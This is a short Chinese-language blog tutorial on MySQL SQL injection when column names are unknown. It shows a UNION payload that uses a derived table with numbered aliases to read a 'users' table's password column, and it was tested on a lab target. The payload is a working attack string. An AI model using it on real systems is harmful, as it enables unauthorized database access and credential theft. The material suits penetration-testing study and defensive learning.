SQL injection without getting the column name

Writing
创建时间:
阅读:
  1. 在无法得到列名下进行注入

在无法得到列名下进行注入

BGM:Welcome to Planet Urf

从这篇文章学习的:如何在不知道MySQL列名的情况下注入出数据?|NOSEC安全讯息平台 - NOSEC.ORG

此方法适用于以下:

盲注的时候跑不出列名

利用条件:

知道列名的个数

mysql命令行测试:

表名为:users
users表里面的列名有:id,username,password
列的个数为3 (1,2,3) (1=>id,2=>username,3=>password)

查询语句为:

select * from users where id=1

payload:

union select 1,(select `2` from (select 1,2,3 union select * from users)a limit 1,1),3

结果:
kDA439.png

靶场测试:
kDAIj1.png

转载请声明:转自422926799.github.io

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:SQL injection without getting the column name

本文作者:九世

发布时间:2019-02-14, 20:31:56

最后更新:2019-04-19, 20:36:16

原始链接:http://jiushill.github.io/posts/f0db9a18.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2016-2019 Yelog

Built with Hexo and 3-hexo theme

目录